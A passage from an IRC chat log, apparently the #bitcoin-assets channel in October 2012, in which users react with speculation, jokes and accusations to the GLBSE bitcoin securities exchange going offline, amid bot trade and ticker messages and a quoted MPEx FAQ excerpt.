18:11:32 it never gets more than 8 connections.. oh, well, the second thing is that a lot of the connections seem to time out Oct 04 18:11:50 and some get refused Oct 04 18:12:04 channel 15: open failed: connect failed: Connection timed out Oct 04 18:12:05 channel 15: open failed: connect failed: Connection refused Oct 04 18:12:09 oh Oct 04 18:12:13 that's not your fault Oct 04 18:12:16 or the proxy Oct 04 18:12:18 okies Oct 04 18:12:25 those are just other people who're NAT'd/proxied Oct 04 18:12:33 they advertise their IP/port to the network Oct 04 18:12:36 but if they're nat'd Oct 04 18:12:38 it will be invalid Oct 04 18:12:40 unless its forwarded Oct 04 18:12:45 just my ignorant me seeing output, eh? Oct 04 18:13:24 GLBSE is offline We will update our users on Saturday. Oct 04 18:13:27 is there a way to open the port to the bitcoin somehow? Oct 04 18:13:30 mother fucker Oct 04 18:13:35 huh? Oct 04 18:13:40 he took it all Oct 04 18:13:46 GLBSE is dead Oct 04 18:13:59 no way Oct 04 18:14:01 wow, i'm glad i cashed out >200btc yesterday Oct 04 18:14:31 I did that the day b/f 'coinica died too Oct 04 18:14:48 that's weird Oct 04 18:14:50 wtf is up Oct 04 18:14:50 I moved 1300 BTC off... still have 60 there in GIGAMINING Oct 04 18:14:58 Huh, wow Oct 04 18:15:00 saturday is far awy Oct 04 18:15:01 www.glbse.com Oct 04 18:15:07 isnt there a forum post Oct 04 18:15:08 or something Oct 04 18:15:11 maybe they were fractional reserve, and suffered a bank run Oct 04 18:15:12 maybe it got owned :-D Oct 04 18:15:22 probalby a bank run Oct 04 18:15:46 ;;calc 1300 * [ticker --last] Oct 04 18:15:47 16900 Oct 04 18:15:50 woah Oct 04 18:15:53 you're a millionare Oct 04 18:16:08 not in coins Oct 04 18:16:09 if you give me 300 BTC Oct 04 18:16:13 i will give you 250 BTC back Oct 04 18:16:15 in 1 year Oct 04 18:16:26 kilothousandair sounds better to me Oct 04 18:16:31 update our users on saturday Oct 04 18:16:32 wtf Oct 04 18:16:46 it was up earlier.. Oct 04 18:16:50 i used it less than 5 hrs ago Oct 04 18:16:54 yeah like 5 min ago Oct 04 18:16:54 okay - where do we riot about this? Oct 04 18:16:56 if it wasn't a bank run it's about to be Oct 04 18:17:00 [MPEX] [S.MPOE] 24300 @ 0.00035853 = 8.7123 BTC [+] Oct 04 18:17:06 because i'm going to sell everything into the ground Oct 04 18:17:12 if it comes back Oct 04 18:17:19 i sent coins to glbse this morning :-/ Oct 04 18:17:23 ouch Oct 04 18:17:26 sorry to hear it Oct 04 18:17:28 for monday's coupon payment Oct 04 18:17:28 something must be up Oct 04 18:17:44 safe harbor in securities exchange? <<< lol Oct 04 18:17:45 motherfucker Oct 04 18:17:48 it can't be good ne3ws Oct 04 18:17:57 i've tried to refrain from dumping my assets Oct 04 18:18:07 mainly because of you guys and not wating to affect you Oct 04 18:18:10 same here Oct 04 18:18:11 now i don't care Oct 04 18:18:26 arf that means BIB.BVPS wont be able to pay out divs Oct 04 18:18:47 that's wack Oct 04 18:18:49 dont copy that floppy Oct 04 18:18:52 jcpham: it's business, i respect you for careing, and i'd respect you for 'looking out for no. 1' too Oct 04 18:18:58 o wait, glbse died a pirate death ? Oct 04 18:19:10 mircea_popescu: late to the party? Oct 04 18:19:10 no mircea Oct 04 18:19:18 smickles i was having buttsex Oct 04 18:19:25 this is so popcorn Oct 04 18:19:25 go to glbse.com already Oct 04 18:19:25 mircea is already writing a forum post talking shit about glbse Oct 04 18:19:30 see for yourself Oct 04 18:20:02 the soap operas my wife watches has NOTHING on this sort of drama Oct 04 18:20:32 other than the sex and adultery part Oct 04 18:20:37 if it comes back <<< yeah. if Oct 04 18:20:38 [MPEX] [S.MPOE] 48829 @ 0.00036007 = 17.5819 BTC [+] Oct 04 18:20:39 [MPEX] [S.MPOE] 36600 @ 0.00036016 = 13.1819 BTC [+] Oct 04 18:20:41 [MPEX] [S.MPOE] 22636 @ 0.00036119 = 8.1759 BTC [+] Oct 04 18:20:45 oh and the murder Oct 04 18:20:53 lol Oct 04 18:20:54 https://bitcointalk.org/index.php?topic=94900.0 Oct 04 18:20:59 imsaguy is listed as a ponzi scheme Oct 04 18:21:11 i'm just saying i have actively refrained from dumping my assets over the past 60 days or so since pirate defaulted Oct 04 18:21:27 if it comes back i'll take whatever i can and leave Oct 04 18:21:42 rg old news Oct 04 18:22:05 imsaguy2: you're only ranked #11 on that list Oct 04 18:23:24 what the hell is going on with GLBSE? Oct 04 18:23:28 turn that stock exchange back on!!! Oct 04 18:24:04 Bugpowder: lol "I should have finished pulling out", now you have a daughter Oct 04 18:24:06 my life savings was jn cpa!! Oct 04 18:24:09 smickles lmao Oct 04 18:24:11 jk Oct 04 18:24:50 so I guess we have been owned? Oct 04 18:25:12 this shit is unreal Oct 04 18:25:18 if Bugpowder's face is on the internet, someone should morph his face with nefario's Oct 04 18:25:20 as if things havent been bad enough lately Oct 04 18:25:43 I thought you were a woman usagi Oct 04 18:25:44 [MPEX] [F.GIGA.ETF] 2800 @ 0.00045475 = 1.2733 BTC [-] Oct 04 18:25:44 [MPEX] [F.GIGA.ETF] 1953 @ 0.00045475 = 0.8881 BTC [-] Oct 04 18:25:45 [MPEX] [F.GIGA.ETF] 4500 @ 0.00045475 = 2.0464 BTC [-] Oct 04 18:25:46 teek shoulda pulled out Oct 04 18:25:46 [MPEX] [F.GIGA.ETF] 10 @ 0.00045475 = 0.0045 BTC [-] Oct 04 18:25:47 [MPEX] [F.GIGA.ETF] 2153 @ 0.00045474 = 0.9791 BTC [-] Oct 04 18:25:48 [MPEX] [F.GIGA.ETF] 2571 @ 0.00045473 = 1.1691 BTC [-] Oct 04 18:25:49 [MPEX] [F.GIGA.ETF] 5100 @ 0.00045472 = 2.3191 BTC [-] Oct 04 18:25:50 [MPEX] [F.GIGA.ETF] 5800 @ 0.00045471 = 2.6373 BTC [-] Oct 04 18:25:51 [MPEX] [F.GIGA.ETF] 9810 @ 0.00045469 = 4.4605 BTC [-] Oct 04 18:25:52 [MPEX] [F.GIGA.ETF] 1900 @ 0.00045463 = 0.8638 BTC [-] Oct 04 18:25:53 [MPEX] [F.GIGA.ETF] 8700 @ 0.00045455 = 3.9546 BTC [-] Oct 04 18:25:53 [MPEX] [F.GIGA.ETF] 3245 @ 0.00045337 = 1.4712 BTC [-] Oct 04 18:25:54 oh dear Oct 04 18:25:54 [MPEX] [F.GIGA.ETF] 8200 @ 0.00045032 = 3.6926 BTC [-] Oct 04 18:25:55 [MPEX] [F.GIGA.ETF] 9500 @ 0.0004472 = 4.2484 BTC [-] Oct 04 18:25:56 [MPEX] [F.GIGA.ETF] 2146 @ 0.00044174 = 0.948 BTC [-] Oct 04 18:25:57 [MPEX] [F.GIGA.ETF] 8785 @ 0.00044165 = 3.8799 BTC [-] Oct 04 18:25:58 [MPEX] [F.GIGA.ETF] 9849 @ 0.00044119 = 4.3453 BTC [-] Oct 04 18:25:58 hm Oct 04 18:25:59 bound to happen Oct 04 18:25:59 [MPEX] [F.GIGA.ETF] 1000 @ 0.00044032 = 0.4403 BTC [-] Oct 04 18:26:00 [MPEX] [F.GIGA.ETF] 7417 @ 0.0004402 = 3.265 BTC [-] Oct 04 18:26:01 [MPEX] [F.GIGA.ETF] 94978 @ 0.00044 = 41.7903 BTC [-] Oct 04 18:26:02 [MPEX] [F.GIGA.ETF] 11400 @ 0.00027879 = 3.1782 BTC [-] Oct 04 18:26:02 [MPEX] [F.GIGA.ETF] 4900 @ 0.00026701 = 1.3083 BTC [-] Oct 04 18:26:03 [MPEX] [F.GIGA.ETF] 100000 @ 0.00023 = 23 BTC [-] Oct 04 18:26:04 [MPEX] [F.GIGA.ETF] 98613 @ 0.00018 = 17.7503 BTC [-] Oct 04 18:26:06 bye bye Oct 04 18:26:08 whoa shit Oct 04 18:26:09 all the way down? Oct 04 18:26:12 oooooooh fuck Oct 04 18:26:16 not yet i see Oct 04 18:26:22 wow Oct 04 18:26:26 NOW WHOS THE IDIOT Oct 04 18:26:26 hehehe Oct 04 18:26:28 Someone decided to pull out Oct 04 18:26:37 i guess that may all be worthless paper now Oct 04 18:26:45 Probably... Oct 04 18:27:07 so this is what being owned feels like Oct 04 18:27:12 Sucks to whoever just bought all those shares. Oct 04 18:27:16 awesome Oct 04 18:27:26 they were stupid to buy them anyway Oct 04 18:27:26 asa1024 you must have missed the many "glbse is a scam" posts Oct 04 18:27:35 no paid upgrade path Oct 04 18:27:51 Bugpowder if asics ever happen. Oct 04 18:28:03 usagi, my wife expects me to lose all the bitcoin money Oct 04 18:28:08 just a matter of time Oct 04 18:28:13 mircea - yeah I've read them but I thought you guys were just slinging mud around everywhere Oct 04 18:28:14 I Oct 04 18:28:14 gues Oct 04 18:28:15 s Oct 04 18:28:16 Oct 04 18:28:17 I Oct 04 18:28:17 gue Oct 04 18:28:18 ss Oct 04 18:28:23 yes Oct 04 18:28:25 I guess I learned something Oct 04 18:28:26 slinging mud Oct 04 18:28:26 mk. live and learn as it is. Oct 04 18:28:30 my girl never slung shit. Oct 04 18:28:33 So, do we think we'll actually hear something on Saturday? Oct 04 18:28:34 but if you ahve half a brain Oct 04 18:28:40 area possibly. Oct 04 18:28:41 you realize the mud is troth Oct 04 18:28:43 truth Oct 04 18:28:50 well yeah now Oct 04 18:28:51 [11:28] Nefario spoke at bitcoin 2012 -- no one saw this coming Oct 04 18:28:53 saw what.. Oct 04 18:28:58 no one even knows what happened Oct 04 18:29:02 [MPEX] [S.MPOE] 8264 @ 0.00036119 = 2.9849 BTC [+] Oct 04 18:29:03 [MPEX] [S.MPOE] 17749 @ 0.00036119 = 6.4108 BTC [+] Oct 04 18:29:04 [MPEX] [S.MPOE] 36600 @ 0.00036124 = 13.2214 BTC [+] Oct 04 18:29:05 [MPEX] [S.MPOE] 17239 @ 0.00036238 = 6.2471 BTC [+] Oct 04 18:29:06 im aware Oct 04 18:29:06 [MPEX] [S.MPOE] 32500 @ 0.00036305 = 11.7991 BTC [+] Oct 04 18:29:07 [MPEX] [S.MPOE] 58700 @ 0.00036411 = 21.3733 BTC [+] Oct 04 18:29:08 [MPEX] [S.MPOE] 38300 @ 0.00036415 = 13.9469 BTC [+] Oct 04 18:29:08 but its not the end of the world Oct 04 18:29:09 [MPEX] [S.MPOE] 37800 @ 0.00036423 = 13.7679 BTC [+] Oct 04 18:29:10 [MPEX] [S.MPOE] 27848 @ 0.00036488 = 10.1612 BTC [+] Oct 04 18:29:11 nefario was last seen in #bitcoin-assets 1 week, 2 days, 19 hours, 29 minutes, and 15 seconds ago: Those assets are not listed or traded anymore Oct 04 18:29:11 YESSSS Oct 04 18:29:16 area: well, if we hear something on sat, how could it be good news Oct 04 18:29:17 for all we know nefario found a huge bug and had to suspend trading ASAP Oct 04 18:29:18 S.MPOE Oct 04 18:29:21 up up up Oct 04 18:29:23 lol Bugpowder Oct 04 18:29:25 you in ? Oct 04 18:29:28 I'm so owned but oh well shit happens I didn't lose much Oct 04 18:29:34 of course Oct 04 18:29:46 rg there's no way he can get btc to cover for all the withdrawals Oct 04 18:29:51 I am diversified across all the non shit MPEX assets Oct 04 18:30:05 Bugpowder so excluding what, rg ? :D Oct 04 18:30:06 dafuq Oct 04 18:30:10 drama. Oct 04 18:30:16 C tranche Oct 04 18:30:25 [MPEX] [S.MPOE] 34388 @ 0.00036488 = 12.5475 BTC [+] Oct 04 18:30:27 [MPEX] [S.MPOE] 45612 @ 0.00036542 = 16.6675 BTC [+] Oct 04 18:30:30 maybe bugpowder is the guy buying up all the s.bvps lately Oct 04 18:30:30 jurov|away: so how's that mpex brokerage coming alon? Oct 04 18:30:32 THIS IS SPARTA Oct 04 18:30:35 Nefario claims to hold all the BTC deposited into GLBSE in a offline wallet, so he should be able to pay all the withdraws. Oct 04 18:30:38 yes thats me Oct 04 18:30:39 dude Oct 04 18:30:43 no one lost anything Oct 04 18:30:46 relax you fuckers Oct 04 18:30:47 Anyone has his phone number,I want to give him a call. Oct 04 18:30:55 DeaDTerra on the other hand christians claim jesus' mom was a virgin at the time Oct 04 18:30:58 he'll obviously be on IRC soon Oct 04 18:31:03 (not in the threatening way, but in the hey m8 what's going on way) Oct 04 18:31:04 riiight Oct 04 18:31:10 ;;seen Nefario Oct 04 18:31:11 Nefario was last seen in #bitcoin-assets 1 week, 2 days, 19 hours, 31 minutes, and 15 seconds ago: Those assets are not listed or traded anymore Oct 04 18:31:19 Bugpowder he did pop in a few days ago Oct 04 18:31:21 DeaDTerra: i'll check my phone log from back in march Oct 04 18:31:22 to reset the counter Oct 04 18:31:25 ;;seen nefario_ Oct 04 18:31:25 nefario_ was last seen in #bitcoin-assets 21 weeks, 6 days, 7 hours, 55 minutes, and 24 seconds ago: I've not got all the commands down Oct 04 18:31:26 usagi: what are you talking about? Oct 04 18:31:27 noob didn't know he has to say something Oct 04 18:31:28 wtf Oct 04 18:31:29 he's been here Oct 04 18:31:35 it hasnt been a week since he was here Oct 04 18:31:41 rg ^^ Oct 04 18:31:48 ;;seen nefario__ Oct 04 18:31:48 I have not seen nefario__. Oct 04 18:31:51 ;;seen nefario- Oct 04 18:31:52 I have not seen nefario-. Oct 04 18:32:14 usagi: i am talking about the great organic coke Oct 04 18:32:21 i know glbse is down Oct 04 18:32:23 :P Oct 04 18:32:23 usagi, you already lost most of it :) Oct 04 18:32:23 theres nothing wrong with doing coke Oct 04 18:32:26 hes english Oct 04 18:32:28 I did not see this GLBSE closure coming. :( I just had a friend invest 20 BTC yesterday. Oct 04 18:32:32 He is going to be mad at me. Oct 04 18:32:33 english people love coke Oct 04 18:32:35 erm Oct 04 18:32:38 its not a glbse closure! Oct 04 18:32:39 wtf! Oct 04 18:32:51 you guys need to fucking relax Oct 04 18:32:53 Did I not said GLBSE was going to die by Nov1 Oct 04 18:32:55 and stop jumping to conclusions Oct 04 18:32:55 rg: Do you know something we don't? Oct 04 18:32:58 'i lost xxxx' Oct 04 18:33:02 you didn't lose anything Oct 04 18:33:07 you dont even know what's going on Oct 04 18:33:13 rg: I can't get my funds... I consider that lost. Oct 04 18:33:17 rg: with the further downward spiral this will cause Oct 04 18:33:21 the bid value of any security held is going to be cut in half Oct 04 18:33:23 temporarily unavailable! Oct 04 18:33:25 ya we did lose something Oct 04 18:33:29 besides Oct 04 18:33:31 Last time I talked to Nefario, he was looking for somewhere to live, I am sure he just has a limited amount of internet access and a bug came up and he had to shutdown the servers to deal with it. Oct 04 18:33:32 nefario has a fuckload of btc Oct 04 18:33:33 like Oct 04 18:33:35 a fuck lot Oct 04 18:33:42 Bugpowder half is a best case scenario i guess Oct 04 18:33:55 i think he probably found a catastrophic bug Oct 04 18:33:55 rg nefario is broke Oct 04 18:34:07 mircea_popescu: so am i but i still have like 300 btc Oct 04 18:34:07 wasn't he borrowing off people at his conference ? Oct 04 18:34:10 ok, DeaDTerra i have a number Oct 04 18:34:16 i guess them folks ain't seeing it back. Oct 04 18:34:24 IT is fucking gone Oct 04 18:34:25 rg 300 is a fucklot ?! Oct 04 18:34:26 I'm not positive it's his, but it's a +44 code Oct 04 18:34:34 what country is +44? Oct 04 18:34:37 soooo... all of you people who gave your id details to nefario Oct 04 18:34:39 time to update my spreadsheet of bitcoin investment losses Oct 04 18:34:39 did you get HIS ? Oct 04 18:34:40 mircea_popescu: for me it is Oct 04 18:34:41 smickles: UK Oct 04 18:34:42 fuck you Oct 04 18:34:46 im not a high roller like all of you Oct 04 18:35:06 !ticker Oct 04 18:35:06 Provide ticker. Oct 04 18:35:14 rg: None of us are high rollers anymore. :( Oct 04 18:35:17 ;ticker Oct 04 18:35:19 !ticker tits&assbot Oct 04 18:35:22 Invalid ticker. Oct 04 18:35:25 hah Oct 04 18:35:31 just post the bitcoin price please Oct 04 18:35:37 $13.06 Oct 04 18:35:41 [MPEX] [S.MPOE] 988 @ 0.00036542 = 0.361 BTC [+] Oct 04 18:35:42 YES Oct 04 18:35:42 [MPEX] [S.MPOE] 8400 @ 0.00036547 = 3.0699 BTC [+] Oct 04 18:35:43 ;;ticker Oct 04 18:35:43 Best bid: 13.02, Best ask: 13.0684, Bid-ask spread: 0.04840, Last trade: 13.02, 24 hour volume: 31652, 24 hour low: 12.703, 24 hour high: 13.0685 Oct 04 18:35:43 [MPEX] [S.MPOE] 7400 @ 0.00036661 = 2.7129 BTC [+] Oct 04 18:35:44 [MPEX] [S.MPOE] 7212 @ 0.00036748 = 2.6503 BTC [+] Oct 04 18:35:47 why wait until saturday to make an announcement? Oct 04 18:35:49 seems kinda shady Oct 04 18:35:49 s.MPOE Oct 04 18:35:54 up up up up up Oct 04 18:35:56 to keep it offline for three days Oct 04 18:36:00 we recently broke 13 too? Oct 04 18:36:02 without telling anyone Oct 04 18:36:06 waht a morning Oct 04 18:36:06 copumpkin that's how the interscamgro crew does Oct 04 18:36:08 usagi: sure Oct 04 18:36:10 bitcoininca redux. Oct 04 18:36:11 13 broke 5 minutes ago Oct 04 18:36:32 relevant: http://imgur.com/fhuyo Oct 04 18:36:34 usagi: When did you talk to Nefario? Oct 04 18:36:52 i want my cupon codes lol Oct 04 18:36:55 lol drekk Oct 04 18:37:01 ahahaha kakobrekla Oct 04 18:37:47 UPDATE Oct 04 18:37:48 GLBSE is offline For those worried about their bitcoin, please calm yourselves there has been no hack and your coins are safe and all accounted for. I apologize for the lack of notice and the downtime, but there isn't much choice. We will update our users on Saturday. Oct 04 18:37:57 dun dun dun Oct 04 18:38:04 is there porn of it ? Oct 04 18:38:24 usagi: Post actual quotes. Oct 04 18:38:34 Vescudero? Oct 04 18:38:35 I got a answer from Nefario. He can't comment on the downtime until Sunday. Oct 04 18:38:45 helpful. Oct 04 18:38:54 how about that Oct 04 18:39:00 Please post proof :) Oct 04 18:39:10 oh, usagi samthan was asking for you Oct 04 18:39:19 said you owed him 1200 btc or somehting Oct 04 18:39:31 who's samthan Oct 04 18:40:12 Fuck GLBSE Oct 04 18:40:19 I'm done with GLBSE Oct 04 18:40:20 The operation succeeded. Oct 04 18:40:24 Glad I pulled my BTC Oct 04 18:41:01 Meanwhile... 13.07597 Oct 04 18:41:04 apparently just in time Oct 04 18:41:11 ;;ticker Oct 04 18:41:11 Best bid: 13.07598, Best ask: 13.08, Bid-ask spread: 0.00402, Last trade: 13.06586, 24 hour volume: 31452, 24 hour low: 12.703, 24 hour high: 13.08 Oct 04 18:41:16 Why is it so hard for Bitcoiners to just run legitimate fucking businesses? :S Oct 04 18:41:22 lol, glbse closing is good for btc Oct 04 18:41:32 Luceo: laws, apparently Oct 04 18:41:41 Summary of GLBSE fiasco please. Oct 04 18:41:45 mircea_popescu: long-term maybe :) short-term, I feel bad for a lot of people getting fucked :( Oct 04 18:41:48 Got a hold of Nefario Oct 04 18:41:48 but I'm a huge pussy Oct 04 18:41:52 mircea_popescu is sipping his cognac Oct 04 18:42:06 copumpkin mee too. especially for the uppity ones who managed to completely fuck themselves over by getting on my ignore list. Oct 04 18:42:07 He doesn't seem to be going anywhere, though he can't comment on anything until Sunday (probably legal reasons). Oct 04 18:42:12 BurtW: it wen't offline, says it'll have info on saturday Oct 04 18:42:32 hey guys, technically your ownership of everything is your own Oct 04 18:42:34 o look, it's a banker. Oct 04 18:42:35 as long as he keeps records Oct 04 18:42:41 of how much everyone owns of everything Oct 04 18:42:54 that shit should be published and signed though Oct 04 18:42:55 asap Oct 04 18:43:07 let's blame BurtW and see if it helps Oct 04 18:43:18 any better? Oct 04 18:43:18 BurtW this is all your fault. Oct 04 18:43:20 i feel better Oct 04 18:43:21 Got a hold of Nefario << only good news so far Oct 04 18:43:22 ;;ticker Oct 04 18:43:22 Best bid: 13.056, Best ask: 13.08, Bid-ask spread: 0.02400, Last trade: 13.08408, 24 hour volume: 31471, 24 hour low: 12.703, 24 hour high: 13.0841 Oct 04 18:43:28 nope apparently doesn't work. Oct 04 18:44:19 oct 4th 2012 the Day the music died. Oct 04 18:44:29 No more Glbse? Oct 04 18:44:33 asa1024: have you seen margin call? Oct 04 18:44:36 Fuck paypal Oct 04 18:44:45 They froze my account for 6 months Oct 04 18:44:47 no not yet - is it any good? Oct 04 18:44:51 yeah, I liked it Oct 04 18:44:53 [MPEX] [S.MPOE] 15000 @ 0.00036748 = 5.5122 BTC [+] Oct 04 18:44:58 jeremy irons hears the music stop, in that movie Oct 04 18:45:04 http://www.youtube.com/watch?v=Y2DqFRsPrns Oct 04 18:45:20 well if that helps anything, strateman, taaki & co haven't "gone anywhere" either. they're still around Oct 04 18:45:25 thanks! i'll check it out! Oct 04 18:45:26 heck, even pirate trolls irc ocasionally. Oct 04 18:45:30 so maybe it will all work out in the end. Oct 04 18:45:31 it's fictional, but designed to mirror more or less what happened during the shitshow Oct 04 18:45:51 Wow no update until Sat, wtf Oct 04 18:46:05 usagi: Hope you get your shit back :x Oct 04 18:46:08 seems legit Oct 04 18:46:35 someone musta called in the federalies Oct 04 18:46:39 hi! we have all your monies. the site is down. sucks to be you. we'll talk about it in a few days. Oct 04 18:46:47 maybe he issues btc coupons Oct 04 18:46:49 it seems nothing is safe anymore Oct 04 18:46:50 [MPEX] [S.MPOE] 1000 @ 0.00036748 = 0.3675 BTC [+] Oct 04 18:46:54 and tells everyone to take it up with the blockchain Oct 04 18:47:01 except gox....for now Oct 04 18:47:06 gavin has to now code something to accept the coupons into the blocks Oct 04 18:47:12 or else you can sue him Oct 04 18:47:14 mtgox has enough money to grease the wheels Oct 04 18:47:29 All the feds are accomplishing is driving legitimate businesses underground, into tor, into darknet, onto IRC Oct 04 18:47:39 who knows Oct 04 18:47:41 asa1024: if you like financial fuckup movies based on true stories, you should also watch rogue trader. That's an even more ridiculous story Oct 04 18:47:43 ErebusBat no sec, just idiocy Oct 04 18:48:09 mircea_popescu: any thread or pastebin I can read to catch up? Other than (CLOSED WILL UPDATE IN A FEW DAYS?) Oct 04 18:48:19 I am talking to James at the moment Oct 04 18:48:21 https://bitcointalk.org/index.php?topic=114442.msg1244763#msg1244763 that maybe. Oct 04 18:48:23 ErebusBat no sec, just idiocy << can you expound on this Oct 04 18:48:38 All the coins are safe, it's not a bug nor a hack. More info will come on Sunday. Try to stay cool kids Oct 04 18:48:40 asa1024: basically a single guy managed to destroy a major bank that had existed for a couple hundred years by lying about how much he was making them Oct 04 18:48:51 BurtW not past what the pr girl has been saying on the forum, and i'm sure you've read and ignored. Oct 04 18:49:14 mircea Oct 04 18:49:17 so are you admitting that you called the cops Oct 04 18:49:19 on nefario? Oct 04 18:49:21 usagi: don't panic, the records of what you own are still intact, I'm sure, and you can settle your ownership with the asset issuers Oct 04 18:49:45 mircea_popescu: I don't get the point of that thread. GLBSE closed down because of pressure from goat? Oct 04 18:49:46 rg me ?! Oct 04 18:49:54 usagi: let's wait and see what happens here... Oct 04 18:49:59 What coins, if you have a bond and not btc your fucked when this is over Oct 04 18:50:01 ErebusBat glbse was a scam platform. it closed down once it became unsustainable. Oct 04 18:50:02 it'll be a pain in the ass, but many of the issuers will be able to move over to mpex, and issue you shares based on what nefario claims you own Oct 04 18:50:16 we get it Oct 04 18:50:24 Massive sell off ck up coming if its back up Sat Oct 04 18:50:26 mircea_popescu: source? other than your opinion? Oct 04 18:50:29 copumpkin you think ? Oct 04 18:50:50 usagi: did you already send your deposit? Oct 04 18:50:50 I already got the Pirate reaming Oct 04 18:51:09 JWU_42 you had an asset did you ? Oct 04 18:51:17 yes - I do Oct 04 18:51:27 o well. prepare for the fun of handling privately your investors. Oct 04 18:51:29 YABMC - a mining bond Oct 04 18:51:31 hopefully < 100 of them Oct 04 18:51:44 yes - think so - but not 100% sure Oct 04 18:51:55 Did asset holders get any advance notice? Oct 04 18:51:57 the ideea is you prepare for contingencies so you don't have to cuff it. Oct 04 18:51:58 usagi: Whats your plan if glbse comes back? Oct 04 18:52:12 usagi: Get everything off there onto something safe? Oct 04 18:52:23 ErebusBat: I received no advance notice (no notice at all) Oct 04 18:52:41 copumpkin why would MPEX take GLBSE trash? makes no sense... cryptostocks maybe Oct 04 18:52:43 lol, theymos knew nothing of this Oct 04 18:52:49 found out on his forum Oct 04 18:52:54 smickles lmao this is great Oct 04 18:53:00 he sold his shares already i take it. Oct 04 18:53:00 smickles bullshit Oct 04 18:53:06 i dunno Oct 04 18:53:07 if no one was given any notice, it isn't good Oct 04 18:53:12 let's not be naive Oct 04 18:53:18 mircea_popescu: i hadn't heard that they sold yet Oct 04 18:53:19 smickles: is there a thread yet? Oct 04 18:53:27 jcpham why not ? after such a long run of being naive, why break it. Oct 04 18:53:28 herp derp I accidently tried to sell my shares at the worst possible time Oct 04 18:53:34 ErebusBat: sort'of https://bitcointalk.org/index.php?topic=115430.20 Oct 04 18:54:16 smickles: ty Oct 04 18:54:50 that's old news rg Oct 04 18:56:02 taking a positive look on things, this chan passed 100 users now, so can't be all bad. Oct 04 18:57:19 Time to open free accounts for Mpex Oct 04 18:57:40 not happening. Oct 04 18:57:42 actually Oct 04 18:57:43 Doffx: no, time for jurov|away's brokerage site to open up public Oct 04 18:57:47 effective immediately, the fee is 30 btc. Oct 04 18:57:50 enjoy. Oct 04 18:58:04 Lol. Oct 04 18:58:19 coinbr.com, iirc Oct 04 18:58:21 AND your eyes can bleed while you use it Oct 04 18:58:26 it is a two-fer Oct 04 18:58:37 Either way I will no longer participate in any exchange. Oct 04 18:59:09 I'm glad I removed all my BTC from Glbse Oct 04 18:59:16 what is left to participate in? Oct 04 18:59:19 Just wish I had time to dump all my shares Oct 04 19:00:10 nefario is legit. for sure there is a reasonable explanation and everyone will get their bitcoins back. i trust the guy. Oct 04 19:00:44 defactomacro: any other bitcoin related securites exchange? Oct 04 19:00:59 there's a whole list in /topic Oct 04 19:01:02 The btc is only one part of the problem, the bigger problem is everyone is going to want out. Oct 04 19:01:02 ;;ident genjix Oct 04 19:01:03 Nick 'genjix', with hostmask 'genjix!~genjix@188.165.73.224', is not identified. Oct 04 19:01:09 you have got to be kidding. Oct 04 19:01:12 So if you own shares what happens. Oct 04 19:01:21 genjix: If ther eis govt intervention it doesn't matter one lick if nefario was legit or not Oct 04 19:01:40 genjix aren't there some coins you folks stole with bitcoinica taht need to be dispensed ? Oct 04 19:01:57 ;;gpg info genjix Oct 04 19:01:57 Doffx: *if* it comes back online then it could be a massive opportunity Oct 04 19:01:57 User 'genjix', with keyid 7F27BD9C634FEC67, fingerprint AC51D09F17398C5F74E8512B7F27BD9C634FEC67, and bitcoin address None, registered on Thu Mar 17 18:28:42 2011. http://bitcoin-otc.com/viewgpg.php?nick=genjix . Currently not authenticated. Oct 04 19:02:05 nefario is legit. for sure there is a reasonable explanation and everyone will get their bitcoins back. i trust the guy. Seconed by me Oct 04 19:02:26 DeaDTerra why do you insist in associating with well known scammers ? Oct 04 19:02:32 mircea_popescu: guruvan "part of the bitcoinica, bitcoin consultancy, bitcoinica consultancy crew that has stolen a large amount of customer funds. Do not trust these guys - bitcoinica, intersango, consultancy, or any new project" Oct 04 19:02:33 it's not a good business plan. Oct 04 19:02:39 I just talked to James, the situation is critical but stable for now. All the coins are safe in the offline wallet. It was not a hack. Oct 04 19:02:52 that, in re to genjix Oct 04 19:02:58 I am losing more respect for you each minute, so please shut up Mircea :) Oct 04 19:03:05 im surprised that he has the gall to even show up Oct 04 19:03:10 much less "vouch" for his scammer friends. Oct 04 19:03:18 DeaDTerra welcome to my ignore. Oct 04 19:03:24 DeaDTerra!*@* added to ignore list. Oct 04 19:03:50 dont care about his wallet, most of my btc are stuck in assets, I want my asset money back if GLBSE does not come back Oct 04 19:04:04 about 1.5K Oct 04 19:04:12 PsychoticBoy that sucks. Oct 04 19:04:47 I agree with PsychoticBoy, I dont have any BTC in there its the assets I'm more concerned with. Oct 04 19:04:47 DeaDTerra, and what is the situation? oO Oct 04 19:05:46 respect, first explain Oct 04 19:06:08 critical, stable. does not say anything Oct 04 19:06:12 DeaDTerra: do you actually know the situation Oct 04 19:06:20 or were you just told "its critical but stable" Oct 04 19:06:24 Sunday? Not Saturday? Oct 04 19:06:30 so tell us, or quit protecting nef Oct 04 19:06:30 Why is it taking so long? Oct 04 19:06:47 Is it legal? Oct 04 19:06:52 WHAT IS THE SITUATION???? Oct 04 19:06:58 DeaDTerra: so then you don't know the situation Oct 04 19:07:07 stable, critical doesnt mean shit Oct 04 19:07:10 hey, all we need now is for BFL to up and run Oct 04 19:07:29 what is stable? Oct 04 19:07:43 at this rate, bitcoin is getting very crappy Oct 04 19:07:57 Hi Oct 04 19:08:02 That's what is written on the site itself Oct 04 19:08:03 heya Oct 04 19:08:04 it's the people PsychoticBoy Oct 04 19:08:08 not nthe bitcoin Oct 04 19:08:18 i know :( Oct 04 19:08:20 or the ideas produced by the people Oct 04 19:08:24 mircea_popescu: Could this shit happen to mpex? Oct 04 19:08:38 of course not Luceo Oct 04 19:08:39 Luceo not as far as i can see Oct 04 19:08:42 propose a scenario ? Oct 04 19:08:46 and even if it could why would he say yes Oct 04 19:08:51 jcpham ^^ eh Oct 04 19:08:58 As far as I know mpex is still centralized Oct 04 19:09:03 it is. Oct 04 19:09:20 What happens to mpex if you disappear? No one can continue their assets? Oct 04 19:09:28 ok lemme pull the faq up Oct 04 19:09:33 21. What happens if your domain(s) or server(s) are confiscated ? Oct 04 19:09:33 In case the domain is confiscated or otherwise lost MPEx will move to a different domain, in a different jurisdiction. Should the same happen again, MPEx would move to what will at the time be a solid alternative for a free Internet, be it the TOR network, namecoin or some equivalent DNS or any comparable solution. No government will ever be able to stop the Internet, in general. We're prepared to show this in the particular. Oct 04 19:09:33 Should the systems be confiscated or otherwise lost the service will failover to different systems, possibly on bulletproof hosting if need be. If sufficient pressure is put on this side MPEx will be recoded as a p2p system. Oct 04 19:09:37 22. Even so, how would the investors be affected in the event MPEx can no longer be continued ? Oct 04 19:09:37 In the unlikely case that the continuation of MPEx becomes impossible, all issuers will be provided with lists of their 